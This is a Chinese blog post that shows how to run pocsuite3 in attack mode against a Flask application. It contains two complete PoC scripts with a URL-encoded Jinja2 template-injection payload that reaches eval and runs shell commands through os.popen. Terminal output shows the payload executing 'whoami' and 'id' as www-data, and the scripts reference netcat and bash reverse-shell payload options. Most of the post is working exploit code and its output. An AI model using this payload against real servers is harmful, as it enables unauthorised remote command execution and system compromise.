pocsuite-攻击模式

1、命令行

root@kali:~/code# pocsuite -r exp-flask.py -u http://192.168.142.132:8000 --attack

,------. ,--. ,--. ,----. {1.8.5-nongit-20211111}
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
| | --'' '-' \ `--.-' `' '' | | | | \ --/'-' |
`--' `---' `---`----' `----'`--' `--' `----`----' http://pocsuite.org
[*] starting at 15:50:14

[15:50:14] [INFO] loading PoC script 'exp-flask.py'
[15:50:14] [INFO] pocsusite got a total of 1 tasks
[15:50:14] [INFO] running poc:'flack' target 'http://192.168.142.132:8000'
Hello name= www-data
[15:50:14] [+] URL : http://192.168.142.132:8000?name=
[15:50:14] [+] Name : name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
[15:50:14] [INFO] Scan completed,ready to print

+-----------------------------+----------+--------+-----------+---------+---------+
| target-url | poc-name | poc-id | component | version | status |
+-----------------------------+----------+--------+-----------+---------+---------+
| http://192.168.142.132:8000 | flack | 1.1 | flask | flask | success |
+-----------------------------+----------+--------+-----------+---------+---------+
success : 1 / 1

[*] shutting down at 15:50:14

root@kali:~/code#

 

接收自定义命令

root@kali:~/code# pocsuite -r all-flask.py -u http://192.168.142.132:8000 --attack --command "id"

,------. ,--. ,--. ,----. {1.8.5-nongit-20211111}
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
| | --'' '-' \ `--.-' `' '' | | | | \ --/'-' |
`--' `---' `---`----' `----'`--' `--' `----`----' http://pocsuite.org
[*] starting at 16:02:21

[16:02:21] [INFO] loading PoC script 'all-flask.py'
[16:02:21] [INFO] pocsusite got a total of 1 tasks
[16:02:21] [INFO] running poc:'flask' target 'http://192.168.142.132:8000'
[16:02:21] [INFO] Parameter command => id
Hello uid=33(www-data) gid=33(www-data) groups=33(www-data)
[16:02:21] [+] URL : http://192.168.142.132:8000?name=
[16:02:21] [+] Name : %7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("id").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
[16:02:21] [INFO] Scan completed,ready to print

+-----------------------------+----------+--------+-----------+---------+---------+
| target-url | poc-name | poc-id | component | version | status |
+-----------------------------+----------+--------+-----------+---------+---------+
| http://192.168.142.132:8000 | flask | 1.1 | flask | flask | success |
+-----------------------------+----------+--------+-----------+---------+---------+
success : 1 / 1

[*] shutting down at 16:02:21

root@kali:~/code#

 

 exp-flask.py

from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1']
    vulDate = '1.1'
    createDate = '1.1'
    updateDate = '1.1'
    references = ['1.1']
    name = 'flack'
    appPowerLink = 'flack'
    appName = 'flask'
    appVersion = 'flask'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
        
    '''
    samples = ['96.234.71.117:80']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o

    def _verify(self):
        output = Output(self)
        result = {}
        # 攻击代码

    def trim(str):
        newstr = ''
        for ch in str:          #遍历每一个字符串
            if ch!=' ':
                newstr = newstr+ch
        return newstr

    def _attack(self):
        result = {}
        path = "?name="
        url = self.url + path
        #print(url)
        cmd = self.get_option("command")
        payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
        #print(payload)
        try:
            resq = requests.get(url + payload)
            t = resq.text 
            t = t.replace('\n', '').replace('\r', '')
            print(t)
            t = t.replace(" ","")
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Name'] = payload
        except Exception as e:
            return 
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        return

    def parse_verify(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)

 

all-flask.py

from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1']
    vulDate = '1.1'
    createDate = '1.1'
    updateDate = '1.1'
    references = ['flask']
    name = 'flask'
    appPowerLink = 'flask'
    appName = 'flask'
    appVersion = 'flask'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
        
    '''
    samples = ['96.234.71.117:80']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o

    def _verify(self):
        result = {}
        path = "?name="
        url = self.url + path
        #print(url)
        payload = "{{22*22}}"
        #print(payload)
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
        except Exception as e:
            return
        return self.parse_verify(result) 

    def trim(str):
        newstr = ''
        for ch in str:          #遍历每一个字符串
            if ch!=' ':
                newstr = newstr+ch
        return newstr

    def _attack(self):
        result = {}
        path = "?name="
        url = self.url + path
        #print(url)
        cmd = self.get_option("command")
        payload = '%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()'\
        '%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20'\
        'for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__'\
        '%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()'\
        '%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("'+cmd+'").read()%27)'\
        '%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor'\
        '%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
        #print(payload)
        try:
            resq = requests.get(url + payload)
            t = resq.text 
            t = t.replace('\n', '').replace('\r', '')
            print(t)
            t = t.replace(" ","")
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Name'] = payload
        except Exception as e:
            return 
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        return

    def parse_verify(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)

  

 

posted @ 2021-11-11 15:51  冰雪2021  阅读(129)  评论(0编辑  收藏  举报
// 侧边栏目录 // https://blog-static.cnblogs.com/files/douzujun/marvin.nav.my1502.css